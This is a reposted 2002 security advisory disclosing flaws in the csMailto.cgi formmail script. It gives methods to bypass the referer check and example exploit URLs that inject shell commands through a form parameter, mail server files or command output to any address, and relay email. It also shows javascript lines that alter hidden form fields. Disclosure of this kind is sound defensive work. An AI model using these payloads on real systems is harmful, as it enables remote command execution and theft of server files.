Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » CGIscript.net - csMailto.cgi - Remote

CGIscript.net - csMailto.cgi - Remote

by Nikola Strahija on April 23rd, 2002 csMailto is a perl cgi formmail script developed by Mike Barone and Andy Angrick of CGIscript.net. From the website "(csMailto is) an automated script that allows the user to build and manage multiple mailto forms to use within your web site. Build your own mailto forms without having to learn Perl. It also can send and receive files!".


The script stores all its configuration data in hidden
form fields, relying on the user to accurately (and
honestly) echo that information back with each form
submission. The only thing allowing a user from
having complete control over the script is a referer
check which is easily bypassed.

Because of this and other problems, the script is
subject to the following attacks:
- execute commands on server
- execute command on server and mail output to anyone
- email server files to anyone
- downloading of logged form input (in CSV format)
- use of form to send email to anyone


EXPLOIT:
---------------------------------------------------------------------
Because the script stored all the form configuration
data in hidden fields in the actual form, once a user
can bypass the referrer check they can essentially do
anything an administrator of the program could do,
plus some additional things that probably weren't
intended.

The script doesn't even check for the full referrer,
it only checks for the presence of the server hostname
in the referral your send. For example, if the script
is http://host.com/cgi-script/CSMailto/CSMailto.cgi
then it will look for "host.com" in the referer.

This method is inherently insecure and can be bypassed
by:

- Creating a perl LWP script which could specify an
arbitrary referrer.

- Using javascript or other means to modify the form
values on the generated CSMailto form and allowing the
browser to send the original (and valid) URL as a
referrer.

- Creating a local form page with the target hostname
in the path and thus the referrer that is sent when in
the form is submitted (eg: C:htmlhost.comform.html)

- Creating a local html page with a simple link (see
below) and the target hostname in the path and thus in
the referrer that is sent when the link is clicked
(eg: C:htmlhost.com.html)

Some example exploits are as follows. Note, these all
assume that the referrer check was bypassed with one
of the above methods.

- execute commands on server

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform

- execute command on server and mail output to anyone

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|[email protected]&form-autoresponse=YES&command=mailform

- email server file to anyone

[email protected]&form-autoresponse=YES&command=mailform

- download/access form input (no referer check)
CSMailto has the option to "have the feedback
exported to an external file". These files
are stored in CSV format and can be downloaded from:
CSMailto/export/FORM_NAME.csv

Form HTML files are often named after their form
names and the information is also stored in hidden
fields in the actual form like so
"...formname=FORM_NAME...". Also, it's worth noting
that the script doesn't properly escape '"', ',', or
nextline ("n") chars, so any CSV data with those
characters may get corrupted.

- use form to send email to anyone

[email protected][email protected]&form-subject=subject&form-results=body&command=mailform

Another example of the seriousness of this problem, as
mentioned above, you can simply load an existing
CSMailto form and have your browser (IE in this
example) change some of the preset hidden form values
and then click submit. Example:

- email server file to anyone

javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");

javascript:alert(document.forms[0]["form-autoresponse"].value="YES");

javascript:alert(document.forms[0]["Email"].value="[email protected]");


IMPACT:
---------------------------------------------------------------------
Because of the high number of users who are using
CGIscript.net scripts (over 17,000 csSearch users
alone according to the website) and the fact that
search engines can easily be used to identify sites
with the unique "csMailto.cgi" script name, the risk
posed by these flaws is very high indeed.


SOLUTION
---------------------------------------------------------------------
Vendor was notified on Apr 5, 2002 of the problem but
has not yet released a fix.

Affected parties may want to consider switching to a
free replacement such as
"nms formmail" which can be found at
http://nms-cgi.sourceforge.net/scripts.shtml


VENDOR HISTORY:
---------------------------------------------------------------------
April 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi,
csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/266432

March 25, 2002 - csSearch.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/264169

DISCLAIMER
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.


FEEDBACK:
---------------------------------------------------------------------
If anyone has any other CGIscript.net scripts they'd
like me to take a look at, just drop me a line at
[email protected]



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »